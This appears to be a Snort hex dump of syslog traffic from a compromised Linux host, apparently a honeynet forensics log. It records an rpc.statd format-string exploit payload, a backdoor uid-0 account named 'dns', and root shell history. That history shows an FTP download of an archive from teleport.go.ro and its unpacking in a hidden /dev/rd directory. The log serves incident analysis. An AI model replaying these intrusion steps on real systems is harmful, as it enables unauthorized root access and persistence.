Log directory = --== Initializing Snort ==-- TCPDUMP file reading mode. Reading network traffic from "scan19\slog2.log" file. snaplen = 1514 --== Initialization Complete ==-- 09/16-03:13:33.606399 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1467 IpLen:20 DgmLen:101 Len: 81 3C 39 34 3E 66 74 70 64 5B 35 30 37 34 5D 3A 20 <94>ftpd[5074]: 6C 6F 73 74 20 63 6F 6E 6E 65 63 74 69 6F 6E 20 lost connection 74 6F 20 41 43 38 38 31 37 41 34 2E 69 70 74 2E to AC8817A4.ipt. 61 6F 6C 2E 63 6F 6D 20 5B 31 37 32 2E 31 33 36 aol.com [172.136 2E 32 33 2E 31 36 34 5D 0A .23.164]. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:33.610924 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1468 IpLen:20 DgmLen:63 Len: 43 3C 39 34 3E 66 74 70 64 5B 35 30 37 34 5D 3A 20 <94>ftpd[5074]: 46 54 50 20 73 65 73 73 69 6F 6E 20 63 6C 6F 73 FTP session clos 65 64 0A ed. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:34.025412 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1469 IpLen:20 DgmLen:70 Len: 50 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 30 37 34 3A 20 65 78 69 74 20 73 pid 5074: exit s 74 61 74 75 73 20 32 35 35 0A tatus 255. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:44.461938 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1476 IpLen:20 DgmLen:101 Len: 81 3C 39 34 3E 66 74 70 64 5B 35 30 37 35 5D 3A 20 <94>ftpd[5075]: 6C 6F 73 74 20 63 6F 6E 6E 65 63 74 69 6F 6E 20 lost connection 74 6F 20 41 43 38 38 31 37 41 34 2E 69 70 74 2E to AC8817A4.ipt. 61 6F 6C 2E 63 6F 6D 20 5B 31 37 32 2E 31 33 36 aol.com [172.136 2E 32 33 2E 31 36 34 5D 0A .23.164]. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:44.464818 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1477 IpLen:20 DgmLen:63 Len: 43 3C 39 34 3E 66 74 70 64 5B 35 30 37 35 5D 3A 20 <94>ftpd[5075]: 46 54 50 20 73 65 73 73 69 6F 6E 20 63 6C 6F 73 FTP session clos 65 64 0A ed. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-03:13:44.482068 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1478 IpLen:20 DgmLen:70 Len: 50 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 30 37 35 3A 20 65 78 69 74 20 73 pid 5075: exit s 74 61 74 75 73 20 32 35 35 0A tatus 255. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-04:06:09.126655 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1481 IpLen:20 DgmLen:1039 Len: 1019 3C 31 37 33 3E 72 70 63 2E 73 74 61 74 64 5B 33 <173>rpc.statd[3 31 38 5D 3A 20 67 65 74 68 6F 73 74 62 79 6E 61 18]: gethostbyna 6D 65 20 65 72 72 6F 72 20 66 6F 72 20 5E 58 F7 me error for ^X. FF BF 5E 58 F7 FF BF 5E 5A F7 FF BF 5E 5A F7 FF ..^X...^Z...^Z.. 
BF 62 66 66 66 66 37 31 30 20 38 30 34 39 37 31 .bffff710 804971 30 39 30 39 30 39 30 39 30 36 38 37 34 36 35 36 0909090906874656 37 36 32 37 34 37 33 36 66 36 64 36 31 36 65 37 76274736f6d616e7 39 37 32 36 35 32 30 36 35 32 30 37 32 36 66 37 97265206520726f7 32 32 30 37 32 36 66 36 36 20 20 20 20 20 20 20 220726f66 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 
20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-08:03:00.695578 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1493 IpLen:20 DgmLen:71 Len: 51 3C 33 30 3E 74 65 6C 6E 65 74 64 5B 35 31 35 30 <30>telnetd[5150 5D 3A 20 74 74 6C 6F 6F 70 3A 20 70 65 65 72 20 ]: ttloop: peer 64 69 65 64 3A 20 45 4F 46 20 0A died: EOF . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-08:03:00.714116 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1495 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 31 35 30 3A 20 65 78 69 74 20 73 pid 5150: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-08:03:22.487883 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1516 IpLen:20 DgmLen:71 Len: 51 3C 33 30 3E 74 65 6C 6E 65 74 64 5B 35 31 35 31 <30>telnetd[5151 5D 3A 20 74 74 6C 6F 6F 70 3A 20 70 65 65 72 20 ]: ttloop: peer 64 69 65 64 3A 20 45 4F 46 20 0A died: EOF . 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-08:03:22.650846 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1518 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 31 35 31 3A 20 65 78 69 74 20 73 pid 5151: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-21:24:36.913740 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1558 IpLen:20 DgmLen:71 Len: 51 3C 33 30 3E 74 65 6C 6E 65 74 64 5B 35 33 36 36 <30>telnetd[5366 5D 3A 20 74 74 6C 6F 6F 70 3A 20 70 65 65 72 20 ]: ttloop: peer 64 69 65 64 3A 20 45 4F 46 20 0A died: EOF . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/16-21:24:36.963226 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1560 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 33 36 36 3A 20 65 78 69 74 20 73 pid 5366: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:38:38.980689 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1561 IpLen:20 DgmLen:100 Len: 80 3C 37 37 3E 61 6E 61 63 72 6F 6E 5B 35 34 32 33 <77>anacron[5423 5D 3A 20 55 70 64 61 74 65 64 20 74 69 6D 65 73 ]: Updated times 74 61 6D 70 20 66 6F 72 20 6A 6F 62 20 60 63 72 tamp for job `cr 6F 6E 2E 64 61 69 6C 79 27 20 74 6F 20 32 30 30 on.daily' to 200 31 2D 30 39 2D 31 36 0A 1-09-16. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:53:05.761806 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1604 IpLen:20 DgmLen:89 Len: 69 3C 33 33 3E 50 41 4D 5F 70 77 64 62 5B 35 36 30 <33>PAM_pwdb[560 38 5D 3A 20 67 65 74 20 70 61 73 73 77 64 3B 20 8]: get passwd; 70 77 64 62 3A 20 72 65 71 75 65 73 74 20 6E 6F pwdb: request no 74 20 72 65 63 6F 67 6E 69 7A 65 64 0A t recognized. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:53:07.193248 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1605 IpLen:20 DgmLen:152 Len: 132 3C 33 37 3E 6C 6F 67 69 6E 5B 35 36 30 38 5D 3A <37>login[5608]: 20 46 41 49 4C 45 44 20 4C 4F 47 49 4E 20 31 20 FAILED LOGIN 1 46 52 4F 4D 20 32 31 37 2E 31 35 36 2E 39 33 2E FROM 217.156.93. 31 36 36 20 46 4F 52 20 6E 6F 62 6F 64 79 2C 20 166 FOR nobody, 41 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 20 73 Authentication s 65 72 76 69 63 65 20 63 61 6E 6E 6F 74 20 72 65 ervice cannot re 74 72 69 65 76 65 20 61 75 74 68 65 6E 74 69 63 trieve authentic 61 74 69 6F 6E 20 69 6E 66 6F 2E 0A ation info.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:53:13.922816 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1621 IpLen:20 DgmLen:89 Len: 69 3C 33 33 3E 50 41 4D 5F 70 77 64 62 5B 35 36 30 <33>PAM_pwdb[560 38 5D 3A 20 67 65 74 20 70 61 73 73 77 64 3B 20 8]: get passwd; 70 77 64 62 3A 20 72 65 71 75 65 73 74 20 6E 6F pwdb: request no 74 20 72 65 63 6F 67 6E 69 7A 65 64 0A t recognized. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:53:15.002839 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1622 IpLen:20 DgmLen:152 Len: 132 3C 33 37 3E 6C 6F 67 69 6E 5B 35 36 30 38 5D 3A <37>login[5608]: 20 46 41 49 4C 45 44 20 4C 4F 47 49 4E 20 32 20 FAILED LOGIN 2 46 52 4F 4D 20 32 31 37 2E 31 35 36 2E 39 33 2E FROM 217.156.93. 31 36 36 20 46 4F 52 20 6E 6F 62 6F 64 79 2C 20 166 FOR nobody, 41 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 20 73 Authentication s 65 72 76 69 63 65 20 63 61 6E 6E 6F 74 20 72 65 ervice cannot re 74 72 69 65 76 65 20 61 75 74 68 65 6E 74 69 63 trieve authentic 61 74 69 6F 6E 20 69 6E 66 6F 2E 0A ation info.. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:54:00.794008 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1633 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 35 36 30 37 3A 20 65 78 69 74 20 73 pid 5607: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-00:55:52.196786 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1653 IpLen:20 DgmLen:111 Len: 91 3C 39 34 3E 66 74 70 64 5B 35 36 30 39 5D 3A 20 <94>ftpd[5609]: 41 4E 4F 4E 59 4D 4F 55 53 20 46 54 50 20 4C 4F ANONYMOUS FTP LO 47 49 4E 20 46 52 4F 4D 20 32 30 37 2E 33 35 2E GIN FROM 207.35. 32 35 31 2E 31 37 32 20 5B 32 30 37 2E 33 35 2E 251.172 [207.35. 32 35 31 2E 31 37 32 5D 2C 20 6D 6F 7A 69 6C 6C 251.172], mozill 61 40 0A a@. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:01:26.013852 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1808 IpLen:20 DgmLen:101 Len: 81 3C 37 37 3E 61 6E 61 63 72 6F 6E 5B 35 36 36 38 <77>anacron[5668 5D 3A 20 55 70 64 61 74 65 64 20 74 69 6D 65 73 ]: Updated times 74 61 6D 70 20 66 6F 72 20 6A 6F 62 20 60 63 72 tamp for job `cr 6F 6E 2E 77 65 65 6B 6C 79 27 20 74 6F 20 32 30 on.weekly' to 20 30 31 2D 30 39 2D 31 36 0A 01-09-16. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:13:35.505627 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1840 IpLen:20 DgmLen:98 Len: 78 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 30 <38>PAM_pwdb[860 38 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 8]: (login) sess 69 6F 6E 20 6F 70 65 6E 65 64 20 66 6F 72 20 75 ion opened for u 73 65 72 20 6E 6F 62 6F 64 79 20 62 79 20 28 75 ser nobody by (u 69 64 3D 30 29 0A id=0). 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:13:50.550914 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1845 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 38 36 30 39 20 55 49 44 3D Y: PID=8609 UID= 39 39 20 77 0A 99 w. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:13:57.182169 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1850 IpLen:20 DgmLen:87 Len: 67 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 30 <38>PAM_pwdb[860 38 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 8]: (login) sess 69 6F 6E 20 63 6C 6F 73 65 64 20 66 6F 72 20 75 ion closed for u 73 65 72 20 6E 6F 62 6F 64 79 0A ser nobody. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:13:57.183211 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1851 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 30 37 3A 20 65 78 69 74 20 73 pid 8607: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:22:13.903878 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1861 IpLen:20 DgmLen:109 Len: 89 3C 33 38 3E 61 64 64 75 73 65 72 5B 38 36 33 32 <38>adduser[8632 5D 3A 20 6E 65 77 20 75 73 65 72 3A 20 6E 61 6D ]: new user: nam 65 3D 64 6E 73 2C 20 75 69 64 3D 30 2C 20 67 69 e=dns, uid=0, gi 64 3D 30 2C 20 68 6F 6D 65 3D 2F 62 69 6E 2C 20 d=0, home=/bin, 73 68 65 6C 6C 3D 2F 62 69 6E 2F 62 61 73 68 20 shell=/bin/bash 0A . 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:18.100236 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1906 IpLen:20 DgmLen:98 Len: 78 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 34 <38>PAM_pwdb[864 35 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 5]: (login) sess 69 6F 6E 20 6F 70 65 6E 65 64 20 66 6F 72 20 75 ion opened for u 73 65 72 20 6E 6F 62 6F 64 79 20 62 79 20 28 75 ser nobody by (u 69 64 3D 30 29 0A id=0). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:28.285384 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1916 IpLen:20 DgmLen:70 Len: 50 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 38 36 34 36 20 55 49 44 3D Y: PID=8646 UID= 39 39 20 73 75 20 64 6E 73 0A 99 su dns. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:29.073220 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1917 IpLen:20 DgmLen:99 Len: 79 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 36 <38>PAM_pwdb[866 31 5D 3A 20 28 73 75 29 20 73 65 73 73 69 6F 6E 1]: (su) session 20 6F 70 65 6E 65 64 20 66 6F 72 20 75 73 65 72 opened for user 20 64 6E 73 20 62 79 20 6E 6F 62 6F 64 79 28 75 dns by nobody(u 69 64 3D 39 39 29 0A id=99). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:34.929713 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1922 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 77 0A =0 w. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:48.752303 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1943 IpLen:20 DgmLen:71 Len: 51 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 63 64 20 2F 74 6D 70 0A =0 cd /tmp. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:32:51.200774 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1950 IpLen:20 DgmLen:69 Len: 49 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 6D 63 20 2D 73 0A =0 mc -s. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:33:06.534390 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:1990 IpLen:20 DgmLen:74 Len: 54 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 63 64 20 2F 64 65 76 2F 72 64 0A =0 cd /dev/rd. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:05.284994 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2020 IpLen:20 DgmLen:82 Len: 62 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 66 74 70 20 74 65 6C 65 70 6F 72 74 2E =0 ftp teleport. 67 6F 2E 72 6F 0A go.ro. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:21.738739 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2044 IpLen:20 DgmLen:74 Len: 54 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 6D 6B 64 69 72 20 73 64 63 30 0A =0 mkdir sdc0. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:27.939131 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2054 IpLen:20 DgmLen:71 Len: 51 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 63 64 20 73 64 63 30 0A =0 cd sdc0. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:29.834834 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2058 IpLen:20 DgmLen:66 Len: 46 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 6C 73 0A =0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:41:33.882770 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2067 IpLen:20 DgmLen:82 Len: 62 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 66 74 70 20 74 65 6C 65 70 6F 72 74 2E =0 ftp teleport. 67 6F 2E 72 6F 0A go.ro. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:43:12.285808 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2369 IpLen:20 DgmLen:85 Len: 65 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 74 61 72 20 7A 78 76 66 20 5A 65 72 30 =0 tar zxvf Zer0 2E 74 61 72 2E 67 7A 20 0A .tar.gz . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:43:21.966675 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2388 IpLen:20 DgmLen:72 Len: 52 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 63 64 20 5A 65 72 30 2F 0A =0 cd Zer0/. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:43:23.826087 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2393 IpLen:20 DgmLen:66 Len: 46 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 6C 73 0A =0 ls. 
